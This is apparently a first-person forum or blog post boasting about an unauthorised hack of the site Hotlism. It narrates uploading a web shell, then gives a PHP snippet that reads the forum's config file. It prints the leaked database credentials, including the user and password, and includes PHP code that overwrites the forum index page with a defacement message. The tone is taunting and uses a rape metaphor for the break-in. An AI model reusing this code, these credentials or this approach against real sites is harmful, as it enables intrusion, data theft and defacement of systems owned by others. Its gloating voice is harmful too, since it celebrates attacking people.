how we hacked hotlism

Maldivian forums were all about hacking and being hacked to prove each others superiority. Hotlism was one of the remaining virgins on the market who was yet to be raped. Since it was to happen and somebody was going to take the initiative I thought why not me? Running a background check on Hotlism revealed that it had lots of security aware people on its team. This made everything though and look impossible. So I formed a 50 50 partnership with ProxyGod.

We neither have nor had anything agaisnt Hotlism expect for them and their users boasting too much about them not being hacked and being "UNHACKABLE". After a few days of look around proxy god managed to break into one of the blogs hosted on hotlism ( rezorn.hotlism.org ) Anyways, he broke in and immediately passed the info on to me.

Primarily i uploaded a shell to their server. but guess what? It didnt work. They seemed to be using .htaccess files to cut off calls from files that looks like shells. Here is what i got.



Then I gave up on that shell and wrote a file on their server with the following contents.
echo file_get_contents('/forums/conf_global.php');
?>

and woodaa. I got a plain text version of their database details which were:
$INFO['use_eaccelerator'] = 1;
$INFO['sql_driver'] = 'mysql';
$INFO['sql_host'] = 'localhost';
$INFO['sql_database'] = 'vpshotli_hotlism';
$INFO['sql_user'] = 'vpshotli_fuck';
$INFO['sql_pass'] = 'fuckfest';
$INFO['sql_tbl_prefix'] = 'ibf_';
$INFO['sql_debug'] = '1';
$INFO['board_start'] = '1213218696';
$INFO['installed'] = '1';
$INFO['php_ext'] = 'php';
$INFO['safe_mode'] = '0';
$INFO['board_url'] = 'http://hotlism.org/forums';
$INFO['banned_group'] = '5';
$INFO['admin_group'] = '4';
$INFO['guest_group'] = '2';
$INFO['member_group'] = '3';
$INFO['auth_group'] = '1';
$INFO['mysql_tbl_type'] = 'MyISAM';
?>

with that, i immediately dumped their database and downloaded it ( thinking it might come in handy later ). After that I simply wrote a new file to their server with the following contents and ran it.


$defaced = <<<html> <head> <title>Hacked</title> </head> <body style='text-align: center;'> <p>&nbsp;</p> <h2>= OOOpS! HACKED =</h2> Proxy God - ChronO<br/>= * = * = * = * = * =<br/> People were starting to make all sorts of craxy assumptions about<br/> hotlism that something like this just had to happen. Next time just<br/> dont pucking go about thinking you are perfect.<br/><br/> Anonymity is freedom<br/> We hope it doesnt hurt too bad. </body> </html>
html;
file_put_contents('/forums/index.php', $defaced);
?>

That easily defaced them. Now all that was left was to include a shoutbox to see who was in on the fun. but we did it a little late it seems. Hotlism guys somehow managed to suspend their own account - everything was gone including the virginity of hotlism. and that was the story of how me and proxygod hacked hotlism.